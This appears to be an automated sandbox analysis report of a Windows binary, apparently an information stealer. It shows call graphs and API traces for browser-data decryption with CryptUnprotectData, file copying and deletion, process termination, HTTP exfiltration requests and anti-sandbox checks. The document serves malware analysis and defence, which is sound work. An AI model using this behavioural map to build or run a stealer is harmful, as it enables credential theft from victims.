14544->14545 14547 407512 14545->14547 14548 413740 lstrcpyA 14546->14548 14549 413860 3 API calls 14547->14549 14558 407d15 14548->14558 14550 40754c 14549->14550 14551 4137c0 lstrcpyA 14550->14551 14552 407555 14551->14552 14553 413860 3 API calls 14552->14553 14554 40757f 14553->14554 14555 413806 2 API calls 14554->14555 14556 40758b 14555->14556 14557 4137c0 lstrcpyA 14556->14557 14559 407593 14557->14559 14558->14507 14560 4075a1 InternetConnectA 14559->14560 14560->14546 14561 4075e4 HttpOpenRequestA 14560->14561 14562 407622 14561->14562 14563 407cc9 InternetCloseHandle 14561->14563 14564 407644 14562->14564 14565 407626 InternetSetOptionA 14562->14565 14563->14546 14566 413860 3 API calls 14564->14566 14565->14564 14567 407687 14566->14567 14568 4137c0 lstrcpyA 14567->14568 14569 40768f 14568->14569 14570 413806 2 API calls 14569->14570 14571 4076a2 14570->14571 14572 4137c0 lstrcpyA 14571->14572 14573 4076aa 14572->14573 14574 413860 3 API calls 14573->14574 14575 4076de 14574->14575 14576 4137c0 lstrcpyA 14575->14576 14577 4076e6 14576->14577 14578 413860 3 API calls 14577->14578 14579 4076fb 14578->14579 14580 4137c0 lstrcpyA 14579->14580 14581 407703 14580->14581 14582 413860 3 API calls 14581->14582 14583 407718 14582->14583 14584 4137c0 lstrcpyA 14583->14584 14585 407720 14584->14585 14586 413860 3 API calls 14585->14586 14587 40775d 14586->14587 14588 4137c0 lstrcpyA 14587->14588 14589 407765 14588->14589 14590 413806 2 API calls 14589->14590 14591 407778 14590->14591 14592 4137c0 lstrcpyA 14591->14592 14593 407780 14592->14593 14594 413860 3 API calls 14593->14594 14595 407795 14594->14595 14596 4137c0 lstrcpyA 14595->14596 14597 40779d 14596->14597 14598 413860 3 API calls 14597->14598 14599 4077b1 14598->14599 14600 4137c0 lstrcpyA 14599->14600 14601 4077b9 14600->14601 14602 413806 2 API calls 14601->14602 14603 4077cc 14602->14603 14604 4137c0 lstrcpyA 14603->14604 14605 4077d4 14604->14605 14606 413860 3 API calls 14605->14606 14607 4077e4 14606->14607 14608 4137c0 lstrcpyA 14607->14608 14609 4077ec 14608->14609 14610 413860 3 API calls 14609->14610 14611 407801 14610->14611 14612 4137c0 lstrcpyA 14611->14612 14613 407809 14612->14613 14614 413860 3 API calls 14613->14614 14615 40784d 14614->14615 14616 4137c0 lstrcpyA 14615->14616 14617 407855 14616->14617 14618 413860 3 API calls 14617->14618 14619 40786a 14618->14619 14620 4137c0 lstrcpyA 14619->14620 14621 407872 14620->14621 14622 413860 3 API calls 14621->14622 14623 407887 14622->14623 14624 4137c0 lstrcpyA 14623->14624 14625 40788f 14624->14625 14626 413860 3 API calls 14625->14626 14627 40789f 14626->14627 14628 4137c0 lstrcpyA 14627->14628 14629 4078a7 14628->14629 14630 413860 3 API calls 14629->14630 14631 4078bc 14630->14631 14632 4137c0 lstrcpyA 14631->14632 14633 4078c4 14632->14633 14634 413806 2 API calls 14633->14634 14635 4078d7 14634->14635 14636 4137c0 lstrcpyA 14635->14636 14637 4078df 14636->14637 14638 413860 3 API calls 14637->14638 14639 4078ef 14638->14639 14640 4137c0 lstrcpyA 14639->14640 14641 4078f7 14640->14641 14642 413860 3 API calls 14641->14642 14643 40790c 14642->14643 14644 4137c0 lstrcpyA 14643->14644 14645 407914 14644->14645 14646 413860 3 API calls 14645->14646 14647 407929 14646->14647 14648 4137c0 lstrcpyA 14647->14648 14649 407931 14648->14649 14650 413860 3 API calls 14649->14650 14651 407946 14650->14651 14652 4137c0 lstrcpyA 14651->14652 14653 40794e 14652->14653 14654 413860 3 API calls 14653->14654 14655 407960 14654->14655 14656 4137c0 lstrcpyA 14655->14656 14657 407968 14656->14657 14658 413860 3 API calls 14657->14658 14659 407978 14658->14659 14660 4137c0 lstrcpyA 14659->14660 14661 407980 14660->14661 14662 413860 3 API calls 14661->14662 14663 407995 14662->14663 14664 4137c0 lstrcpyA 14663->14664 14665 40799d 14664->14665 14666 413806 2 API calls 14665->14666 14667 4079b0 14666->14667 14668 4137c0 lstrcpyA 14667->14668 14669 4079b8 14668->14669 14670 413860 3 API calls 14669->14670 14671 4079c8 14670->14671 14672 4137c0 lstrcpyA 14671->14672 14673 4079d0 14672->14673 14674 413860 3 API calls 14673->14674 14675 4079e5 14674->14675 14676 4137c0 lstrcpyA 14675->14676 14677 4079ed 14676->14677 14678 413860 3 API calls 14677->14678 14679 407a2a 14678->14679 14680 4137c0 lstrcpyA 14679->14680 14681 407a32 14680->14681 14682 413860 3 API calls 14681->14682 14683 407a46 14682->14683 14684 4137c0 lstrcpyA 14683->14684 14685 407a4e 14684->14685 14686 407a62 lstrlenA 14685->14686 14738 41398e 14686->14738 14688 407a78 lstrlenA GetProcessHeap RtlAllocateHeap 14689 407aa0 14688->14689 14690 407ab0 lstrlenA memcpy 14689->14690 14739 41398e 14690->14739 14692 407ad0 lstrlenA memcpy 14740 41398e 14692->14740 14694 407af4 lstrlenA 14695 407b06 14694->14695 14696 407b16 lstrlenA memcpy 14695->14696 14698 407b2c 14696->14698 14697 407b44 lstrlenA 14697->14698 14698->14697 14699 407b50 HttpSendRequestA 14698->14699 14700 407b62 Sleep 14699->14700 14701 407bbf 14699->14701 14702 407b77 14700->14702 14706 407b7c 14700->14706 14703 407bca HttpQueryInfoA 14701->14703 14702->14698 14702->14706 14704 407bf3 14703->14704 14705 407d69 14703->14705 14704->14705 14710 407c04 InternetReadFile 14704->14710 14707 41370e lstrcpyA 14705->14707 14708 41370e lstrcpyA 14706->14708 14707->14558 14709 407bb7 14708->14709 14709->14558 14711 407c21 14710->14711 14713 407c75 14710->14713 14711->14713 14718 407c28 14711->14718 14712 407ca6 StrCmpCA 14715 407cb5 ExitProcess 14712->14715 14716 407cbd InternetCloseHandle 14712->14716 14713->14712 14714 413860 3 API calls 14714->14718 14716->14563 14717 4137c0 lstrcpyA 14717->14718 14718->14713 14718->14714 14718->14717 14719 407c57 InternetReadFile 14718->14719 14719->14713 14719->14718 14721 41480d memset 14720->14721 14722 41481e 14720->14722 14721->14722 14722->14504 14724 406bec 14723->14724 14724->14724 14725 406bf7 ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 14724->14725 14741 41398e 14725->14741 14727 406c49 lstrlenA 14742 41398e 14727->14742 14729 406c55 InternetCrackUrlA 14730 406c63 14729->14730 14730->14519 14732 414be4 14731->14732 14733 414b82 14731->14733 14732->14521 14733->14732 14734 414b96 CryptBinaryToStringA 14733->14734 14734->14732 14735 414bb0 GetProcessHeap RtlAllocateHeap 14734->14735 14735->14732 14736 414bcb CryptBinaryToStringA 14735->14736 14736->14732 14737 414bf4 GetLastError GetProcessHeap HeapFree 14736->14737 14737->14732 14738->14688 14739->14692 14740->14694 14741->14727 14742->14729 14763 401325 GetPEB 14764 40133c 14763->14764 14765 401342 lstrcmpiW 14764->14765 14766 401355 GetPEB 14764->14766 14765->14764 14767 401350 14765->14767 14768 401363 14766->14768 14769 401369 lstrcmpiW 14768->14769 14770 40137c GetPEB 14768->14770 14769->14767 14769->14768 14771 40138a 14770->14771 14772 401390 lstrcmpiW 14771->14772 14773 4013a3 GetPEB 14771->14773 14772->14767 14772->14771 14774 4013b1 14773->14774 14775 4013b7 lstrcmpiW 14774->14775 14776 4013ca GetPEB 14774->14776 14775->14767 14775->14774 14777 4013d8 14776->14777 14778 4013ee GetPEB 14777->14778 14779 4013de lstrcmpiW 14777->14779 14780 4013fc 14778->14780 14779->14767 14779->14777 14781 401412 14780->14781 14782 401402 lstrcmpiW 14780->14782 14792 4012ed GetPEB 14781->14792 14782->14767 14782->14780 14785 4012ed 2 API calls 14786 40142a 14785->14786 14786->14767 14787 4012ed 2 API calls 14786->14787 14788 401438 14787->14788 14788->14767 14789 4012ed 2 API calls 14788->14789 14790 401446 14789->14790 14790->14767 14791 4012ed 2 API calls 14790->14791 14791->14767 14793 401309 14792->14793 14794 401319 14793->14794 14795 40130f lstrcmpiW 14793->14795 14794->14767 14794->14785 14795->14793 14795->14794 14825 40e92a 14826 40e931 14825->14826 14837 40e955 14825->14837 14827 413740 lstrcpyA 14826->14827 14829 40e936 14827->14829 14828 413740 lstrcpyA 14830 40e998 14828->14830 14831 414ab3 GetFileAttributesA 14829->14831 14832 413740 lstrcpyA 14830->14832 14833 40e93b 14831->14833 14834 40e9ab 14832->14834 14836 40ea24 14833->14836 14833->14837 14857 40ea05 14833->14857 14835 413740 lstrcpyA 14834->14835 14838 40e9ba 14835->14838 14839 413740 lstrcpyA 14836->14839 14837->14828 14837->14857 14840 413740 lstrcpyA 14838->14840 14841 40ea3b 14839->14841 14842 40e9d3 14840->14842 14844 413740 lstrcpyA 14841->14844 14843 413740 lstrcpyA 14842->14843 14845 40e9fa 14843->14845 14846 40ea4a 14844->14846 14847 413740 lstrcpyA 14845->14847 14848 413740 lstrcpyA 14846->14848 14847->14857 14849 40ea59 14848->14849 14850 413740 lstrcpyA 14849->14850 14851 40ea72 14850->14851 14852 413740 lstrcpyA 14851->14852 14853 40ea9f 14852->14853 14876 40b14b 14853->14876 14855 40eabd 14856 413740 lstrcpyA 14855->14856 14855->14857 14858 40eaeb 14856->14858 14859 413740 lstrcpyA 14858->14859 14860 40eafd 14859->14860 14861 413740 lstrcpyA 14860->14861 14862 40eb15 14861->14862 14863 413740 lstrcpyA 14862->14863 14864 40eb21 14863->14864 14865 41370e lstrcpyA 14864->14865 14866 40eb2e 14865->14866 14867 413740 lstrcpyA 14866->14867 14868 40eb39 14867->14868 14869 413740 lstrcpyA 14868->14869 14870 40eb44 14869->14870 14871 413740 lstrcpyA 14870->14871 14872 40eb4f 14871->14872 14873 413740 lstrcpyA 14872->14873 14874 40eb67 14873->14874 14875 40b942 275 API calls 14874->14875 14875->14857 14877 41370e lstrcpyA 14876->14877 14878 40b16c 14877->14878 14879 40ae6d 6 API calls 14878->14879 14880 40b17d 14879->14880 14882 40b211 14880->14882 14890 414b34 14880->14890 14886 40b2a3 lstrlenA 14882->14886 14887 413860 3 API calls 14882->14887 14889 41797d 116 API calls 14882->14889 14894 40b006 CryptUnprotectData 14882->14894 14902 40ab34 14882->14902 14883 40b194 14883->14882 14898 40af38 lstrlenA 14883->14898 14886->14882 14887->14882 14889->14882 14891 414b41 14890->14891 14892 414b59 14890->14892 14891->14892 14893 414b49 LocalAlloc 14891->14893 14892->14883 14893->14892 14895 40b047 LocalAlloc 14894->14895 14896 40b06f LocalFree 14894->14896 14895->14896 14897 40b063 14895->14897 14896->14882 14897->14896 14899 40af5d LocalAlloc 14898->14899 14901 40af81 14899->14901 14901->14882 14903 413740 lstrcpyA 14902->14903 14904 40ab42 14903->14904 14905 413740 lstrcpyA 14904->14905 14906 40ab4e 14905->14906 14907 413740 lstrcpyA 14906->14907 14908 40ab5a 14907->14908 14909 413740 lstrcpyA 14908->14909 14910 40ab70 14909->14910 14910->14882 14962 40106e GetCurrentProcess VirtualAllocExNuma 14963 4010a3 ExitProcess 14962->14963 14964 40109b 14962->14964 14964->14963 19240 406bae 19241 406be6 ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 19240->19241 19242 406bb8 19240->19242 19249 41398e 19241->19249 19245 406c49 lstrlenA 19250 41398e 19245->19250 19247 406c55 InternetCrackUrlA 19248 406c63 19247->19248 19249->19245 19250->19247 14965 406c70 14966 413740 lstrcpyA 14965->14966 14967 406c9b 14966->14967 14968 406be0 5 API calls 14967->14968 14969 406ca8 14968->14969 14970 41370e lstrcpyA 14969->14970 14971 406cba 14970->14971 14972 41370e lstrcpyA 14971->14972 14973 406cc3 14972->14973 14974 41370e lstrcpyA 14973->14974 14975 406ccc 14974->14975 14976 41370e lstrcpyA 14975->14976 14977 406cd5 14976->14977 14978 41370e lstrcpyA 14977->14978 14979 406cde 14978->14979 14980 406ceb InternetOpenA StrCmpCA 14979->14980 14981 4072fb InternetCloseHandle 14980->14981 14982 406d1e 14980->14982 14986 407314 14981->14986 14983 4148f3 4 API calls 14982->14983 14984 406d2f 14983->14984 14985 413806 2 API calls 14984->14985 14987 406d41 14985->14987 14988 413740 lstrcpyA 14986->14988 14989 4137c0 lstrcpyA 14987->14989 14999 407327 14988->14999 14990 406d49 14989->14990 14991 413860 3 API calls 14990->14991 14992 406d87 14991->14992 14993 4137c0 lstrcpyA 14992->14993 14994 406d8f 14993->14994 14995 413860 3 API calls 14994->14995 14996 406dcd 14995->14996 14997 4137c0 lstrcpyA 14996->14997 14998 406dd5 14997->14998 15000 413806 2 API calls 14998->15000 15001 406de8 15000->15001 15002 4137c0 lstrcpyA 15001->15002 15003 406df0 15002->15003 15004 413860 3 API calls 15003->15004 15005 406e24 15004->15005 15006 4137c0 lstrcpyA 15005->15006 15007 406e2c 15006->15007 15008 413860 3 API calls 15007->15008 15009 406e40 15008->15009 15010 4137c0 lstrcpyA 15009->15010 15011 406e48 15010->15011 15012 413860 3 API calls 15011->15012 15013 406e60 15012->15013 15014 413806 2 API calls 15013->15014 15015 406e6c 15014->15015 15016 4137c0 lstrcpyA 15015->15016 15017 406e74 15016->15017 15018 406e82 InternetConnectA 15017->15018 15018->14981 15019 406ec8 HttpOpenRequestA 15018->15019 15020 406f03 15019->15020 15021 4072f4 InternetCloseHandle 15019->15021 15022 406f12 InternetSetOptionA 15020->15022 15023 406f2a 15020->15023 15021->14981 15022->15023 15024 413860 3 API calls 15023->15024 15025 406f67 15024->15025 15026 4137c0 lstrcpyA 15025->15026 15027 406f6f 15026->15027 15028 413806 2 API calls 15027->15028 15029 406f7f 15028->15029 15030 4137c0 lstrcpyA 15029->15030 15031 406f87 15030->15031 15032 413860 3 API calls 15031->15032 15033 406fbb 15032->15033 15034 4137c0 lstrcpyA 15033->15034 15035 406fc3 15034->15035 15036 413860 3 API calls 15035->15036 15037 406fd8 15036->15037 15038 4137c0 lstrcpyA 15037->15038 15039 406fe0 15038->15039 15040 413860 3 API calls 15039->15040 15041 407015 15040->15041 15042 4137c0 lstrcpyA 15041->15042 15043 40701d 15042->15043 15044 413860 3 API calls 15043->15044 15045 407054 15044->15045 15046 4137c0 lstrcpyA 15045->15046 15047 40705c 15046->15047 15048 413806 2 API calls 15047->15048 15049 40706f 15048->15049 15050 4137c0 lstrcpyA 15049->15050 15051 407077 15050->15051 15052 413860 3 API calls 15051->15052 15053 40708c 15052->15053 15054 4137c0 lstrcpyA 15053->15054 15055 407094 15054->15055 15056 413860 3 API calls 15055->15056 15057 4070a8 15056->15057 15058 4137c0 lstrcpyA 15057->15058 15059 4070b0 15058->15059 15060 413806 2 API calls 15059->15060 15061 4070c3 15060->15061 15062 4137c0 lstrcpyA 15061->15062 15063 4070cb 15062->15063 15064 413860 3 API calls 15063->15064 15065 4070db 15064->15065 15066 4137c0 lstrcpyA 15065->15066 15067 4070e3 15066->15067 15068 413860 3 API calls 15067->15068 15069 4070f8 15068->15069 15070 4137c0 lstrcpyA 15069->15070 15071 407102 15070->15071 15072 413860 3 API calls 15071->15072 15073 40713d 15072->15073 15074 4137c0 lstrcpyA 15073->15074 15075 407145 15074->15075 15076 413860 3 API calls 15075->15076 15077 407159 15076->15077 15078 4137c0 lstrcpyA 15077->15078 15079 407161 15078->15079 15080 413806 2 API calls 15079->15080 15081 407174 15080->15081 15082 4137c0 lstrcpyA 15081->15082 15083 40717c 15082->15083 15084 41370e lstrcpyA 15083->15084 15085 407192 15084->15085 15086 413806 2 API calls 15085->15086 15087 4071a1 15086->15087 15088 413806 2 API calls 15087->15088 15089 4071ad 15088->15089 15090 4137c0 lstrcpyA 15089->15090 15093 4071b5 15090->15093 15091 4071dd lstrlenA 15091->15093 15092 4071fa lstrlenA 15092->15093 15093->15091 15093->15092 15094 407272 InternetReadFile 15093->15094 15095 407217 Sleep 15093->15095 15098 4072da InternetCloseHandle 15094->15098 15099 40728f 15094->15099 15096 407235 15095->15096 15097 407228 15095->15097 15101 41370e lstrcpyA 15096->15101 15097->15093 15097->15096 15100 4072eb 15098->15100 15099->15098 15105 407296 15099->15105 15100->15021 15102 407265 15101->15102 15102->14999 15103 413860 3 API calls 15103->15105 15104 4137c0 lstrcpyA 15104->15105 15105->15098 15105->15103 15105->15104 15106 4072bc InternetReadFile 15105->15106 15106->15098 15106->15105 15107 4010b0 memset memset 15108 4010f9 lstrcatA 15107->15108 15109 4010e9 15107->15109 15110 40111e lstrcatA 15108->15110 15111 40110e 15108->15111 15109->15108 15112 401143 lstrcatA 15110->15112 15113 401133 15110->15113 15111->15110 15114 401168 lstrcatA 15112->15114 15115 401158 15112->15115 15113->15112 15116 40118d lstrcatA lstrcatA 15114->15116 15117 40117d 15114->15117 15115->15114 15118 4011bc lstrcatA 15116->15118 15119 4011ac 15116->15119 15117->15116 15120 4011e1 lstrcatA 15118->15120 15121 4011d1 15118->15121 15119->15118 15122 401206 lstrcatA 15120->15122 15123 4011f6 15120->15123 15121->15120 15124 40122b lstrcatA 15122->15124 15125 40121b 15122->15125 15123->15122 15126 401250 lstrcatA lstrcatA 15124->15126 15127 401240 15124->15127 15125->15124 15128 401279 lstrcatA 15126->15128 15129 401269 15126->15129 15127->15126 15137 413dbf GetProcessHeap HeapAlloc GetComputerNameA 15128->15137 15129->15128 15131 40128a strcmp 15132 401298 15131->15132 15133 4012ab 15131->15133 15138 413d91 GetProcessHeap HeapAlloc GetUserNameA 15132->15138 15135 40129d strcmp 15135->15133 15136 4012b6 ExitProcess 15135->15136 15137->15131 15138->15135 18311 b00001 18312 b00005 18311->18312 18317 b0092b GetPEB 18312->18317 18314 b00030 18319 b0003c 18314->18319 18318 b00972 18317->18318 18318->18314 18320 b00049 18319->18320 18321 b00e0f 2 API calls 18320->18321 18322 b00223 18321->18322 18323 b00d90 GetPEB 18322->18323 18324 b00238 VirtualAlloc 18323->18324 18325 b00265 18324->18325 18326 b002ce VirtualProtect 18325->18326 18328 b0030b 18326->18328 18327 b00439 VirtualFree 18332 b005f4 LoadLibraryA 18327->18332 18333 b004be 18327->18333 18328->18327 18329 b004e3 LoadLibraryA 18329->18333 18331 b008c7 18332->18331 18333->18329 18333->18332

                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                  Function 0040B942 Relevance: 59.1, APIs: 23, Strings: 10, Instructions: 1344filestringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 671 40b942-40b979 call 41370e call 413806 676 40b992-40b9fd call 413860 call 4137c0 call 413770 * 2 call 41370e * 2 call 41398e FindFirstFileA 671->676 677 40b97b-40b98b 671->677 692 40ba03-40ba28 676->692 693 40cc7d-40ccee call 413770 * 12 676->693 677->676 694 40ba2b-40ba32 692->694 696 40ba44-40ba59 694->696 697 40ba34-40ba3d 694->697 703 40c27a-40c289 FindNextFileA 696->703 704 40ba5f-40ba66 696->704 697->696 703->694 706 40c28f 703->706 707 40ba68-40ba78 704->707 708 40ba7f-40ba94 704->708 710 40cc6e-40cc7a FindClose 706->710 707->708 708->703 713 40ba9a-40babc call 413778 call 413806 708->713 710->693 723 40bace-40bb1d call 413860 * 2 call 4137c0 call 413770 * 3 713->723 724 40babe-40bac7 713->724 748 40bb85-40bb8c 723->748 749 40bb1f-40bb31 call 41398e 723->749 724->723 751 40bb9e 748->751 752 40bb8e-40bb97 748->752 756 40bb51-40bb62 StrCmpCA 749->756 757 40bb33-40bb4a 749->757 754 40bba1-40bbff call 413860 * 4 call 4137c0 call 413770 * 3 751->754 752->751 793 40bc84-40bca1 call 413770 call 41398e 754->793 759 40bc04-40bc0b 756->759 760 40bb68-40bb6f 756->760 757->756 761 40bc1d-40bc81 call 413860 * 4 call 4137c0 call 413770 * 3 759->761 762 40bc0d-40bc16 759->762 764 40bb81-40bb83 760->764 765 40bb71-40bb7a 760->765 761->793 762->761 764->754 765->764 800 40bca3-40bcb6 793->800 801 40bcbd-40bcd3 StrCmpCA 793->801 800->801 802 40bcd9-40bce0 801->802 803 40bf4a-40bf59 StrCmpCA 801->803 804 40bce2-40bcfc 802->804 805 40bd03-40bd12 802->805 806 40c0b8-40c15d call 413740 * 7 call 40b4f3 803->806 807 40bf5f-40bf6e StrCmpCA 803->807 804->805 805->803 818 40bd18-40bd4a call 41370e call 413860 call 413806 805->818 936 40c162 806->936 809 40c294-40c2ae call 41398e StrCmpCA 807->809 810 40bf74-40bf8e call 413740 call 414ab3 807->810 822 40c2b4-40c2ba 809->822 823 40c165-40c16c 809->823 835 40bf94-40bf9a 810->835 836 40c4c7-40c4dc StrCmpCA 810->836 870 40bd5c-40be02 call 413860 call 4148f3 call 413806 call 4137c0 call 413770 * 5 call 41398e * 2 call 41370e call 413860 818->870 871 40bd4c-40bd55 818->871 822->823 824 40c2c0-40c2ca 822->824 825 40c262-40c274 call 41395a * 2 823->825 826 40c172-40c25a call 413740 * 4 call 41370e call 413740 * 4 call 40b942 823->826 830 40c2d0-40c2e5 824->830 831 40cb14-40cb55 memset call 41398e lstrcatA call 41398e lstrcatA 824->831 825->703 1004 40c25f 826->1004 830->703 838 40c2e7-40c319 call 41370e call 413860 call 413806 830->838 885 40cb57-40cb63 831->885 886 40cb99-40cc27 call 41398e * 3 call 413740 * 4 831->886 835->823 842 40bfa0-40bfaa 835->842 845 40c4e2-40c4f1 StrCmpCA 836->845 846 40c7e5-40c817 call 41370e call 413860 call 413806 836->846 911 40c32b-40c386 call 413860 call 4148f3 call 413806 call 4137c0 call 413770 * 5 838->911 912 40c31b-40c324 838->912 851 40bfb0-40bfc5 842->851 852 40c6d2-40c713 memset call 41398e lstrcatA call 41398e lstrcatA 842->852 845->823 856 40c4f7-40c529 call 41370e call 413860 call 413806 845->856 907 40c829-40c8b9 call 413860 call 4148f3 call 413806 call 4137c0 call 413770 * 5 call 41398e * 2 CopyFileA call 413740 call 40ae6d 846->907 908 40c819-40c822 846->908 851->703 862 40bfcb-40bffd call 41370e call 413860 call 413806 851->862 903 40c715-40c721 852->903 904 40c757-40c7e0 call 41398e * 2 call 413740 * 4 852->904 919 40c53b-40c5b7 call 413860 call 4148f3 call 413806 call 4137c0 call 413770 * 5 call 41398e * 2 CopyFileA 856->919 920 40c52b-40c534 856->920 937 40c00f-40c076 call 413860 call 4148f3 call 413806 call 4137c0 call 413770 * 5 call 41398e 862->937 938 40bfff-40c008 862->938 1085 40be04 870->1085 1086 40be2b-40be77 call 413860 call 4137c0 call 413770 * 2 call 413740 call 40ae6d 870->1086 871->870 895 40cb68-40cb8a 885->895 1026 40cc2a-40cc3c call 40ab8f 886->1026 895->895 896 40cb8c-40cb93 895->896 896->886 915 40c726-40c748 903->915 904->1026 1099 40c8be-40c8c2 907->1099 908->907 1056 40c38b-40c3ae call 41398e * 2 CopyFileA 911->1056 912->911 915->915 925 40c74a-40c751 915->925 1082 40c9e0-40c9f2 call 41398e DeleteFileA call 41395a 919->1082 1083 40c5bd-40c5d9 call 413740 call 40ae6d 919->1083 920->919 925->904 936->823 1074 40c079-40c088 call 41398e CopyFileA 937->1074 938->937 1004->825 1038 40cc41 1026->1038 1038->936 1077 40c3b0-40c3d4 call 413740 call 415071 Sleep 1056->1077 1078 40c3e5-40c410 call 413740 call 40ae6d 1056->1078 1094 40ca03-40ca2e call 413740 call 40ae6d 1074->1094 1095 40c08e-40c0b6 call 413740 call 415071 call 41398e 1074->1095 1077->1056 1123 40c3d6-40c3e0 call 4137c0 1077->1123 1126 40cc62 1078->1126 1127 40c416-40c426 1078->1127 1118 40c9f7-40c9fe call 413770 1082->1118 1112 40c5de-40c5e2 1083->1112 1093 40be09-40be1c 1085->1093 1184 40bf15-40bf44 call 41398e DeleteFileA call 41395a call 41398e call 413770 * 2 1086->1184 1185 40be7d-40bf10 call 413740 * 5 call 41797d call 413770 1086->1185 1093->1093 1104 40be1e-40be28 1093->1104 1143 40ca34-40ca44 1094->1143 1144 40cc46-40cc4f 1094->1144 1095->1074 1099->1082 1109 40c8c8-40c8d8 1099->1109 1104->1086 1110 40c8ea-40c920 call 413860 call 413806 1109->1110 1111 40c8da-40c8e3 1109->1111 1157 40c922-40c93c 1110->1157 1158 40c943-40c9a7 call 413860 call 413740 * 4 1110->1158 1111->1110 1112->1082 1121 40c5e8-40c5f8 1112->1121 1118->823 1130 40c60a-40c640 call 413860 call 413806 1121->1130 1131 40c5fa-40c603 1121->1131 1123->1078 1126->710 1136 40c428-40c442 1127->1136 1137 40c449-40c463 1127->1137 1171 40c642-40c65c 1130->1171 1172 40c663-40c6cd call 413860 call 413740 * 4 1130->1172 1131->1130 1136->1137 1139 40c469-40c4c2 call 413740 * 4 1137->1139 1140 40c464 call 413860 1137->1140 1199 40cae0-40cb0f call 41797d call 413770 1139->1199 1140->1139 1151 40ca46-40ca60 1143->1151 1152 40ca67-40cada call 413860 call 413740 * 4 1143->1152 1150 40cc55-40cc5d call 413770 1144->1150 1151->1152 1152->1199 1157->1158 1219 40c9ad-40c9da call 41797d call 413770 * 3 1158->1219 1171->1172 1172->1219 1184->803 1185->1184 1199->1150 1219->1082
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850
                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,0042EEFC,0042EEFC,?,?,00643AFF,?,?,0042EEFC), ref: 0040B9F2
                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,?), ref: 0040BF23
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 0040BF51
                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(?,?), ref: 0040C281
                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C084
                                                                                                                                                                                                                                                    • Part of subcall function 00415071: OpenProcess.KERNEL32(00001001,00000000,?), ref: 0041512A
                                                                                                                                                                                                                                                    • Part of subcall function 00415071: TerminateProcess.KERNEL32(00000000,00000000), ref: 00415139
                                                                                                                                                                                                                                                    • Part of subcall function 00415071: CloseHandle.KERNEL32(00000000), ref: 00415140
                                                                                                                                                                                                                                                    • Part of subcall function 0040B4F3: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040B5BB
                                                                                                                                                                                                                                                    • Part of subcall function 0040B4F3: Sleep.KERNEL32(000003E8,?), ref: 0040B5DE
                                                                                                                                                                                                                                                    • Part of subcall function 0040B4F3: PathFileExistsA.SHLWAPI(00000000), ref: 0040B5FC
                                                                                                                                                                                                                                                    • Part of subcall function 0040B4F3: CreateFileA.KERNEL32 ref: 0040B634
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,?), ref: 0040C4D4
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 0040C4E9
                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C5AE
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040C6DA
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000,?), ref: 0040C6F5
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040C70A
                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C89C
                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,?), ref: 0040C9EE
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 0040BF66
                                                                                                                                                                                                                                                    • Part of subcall function 0041797D: Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00417A27
                                                                                                                                                                                                                                                    • Part of subcall function 0041797D: CreateThread.KERNEL32(00000000,00000000,Function_0001A90D,?,00000000,00000000), ref: 00417A79
                                                                                                                                                                                                                                                    • Part of subcall function 0041797D: WaitForSingleObject.KERNEL32(00000000,000003E8,?,?,?,?,?,?,?,?,?,?,?,?,004017BD,?), ref: 00417A85
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,Opera GX,?,?,?,?,00643A71,?,?,0042EEFC), ref: 0040BB57
                                                                                                                                                                                                                                                    • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: CreateFileA.KERNEL32 ref: 0040AEA5
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: GetFileSizeEx.KERNEL32(00000000,?), ref: 0040AEB5
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: LocalAlloc.KERNEL32(00000040,8BE3897C), ref: 0040AED8
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: ReadFile.KERNEL32(00000000,EC8350EC,8BE3897C,?,00000000), ref: 0040AEF9
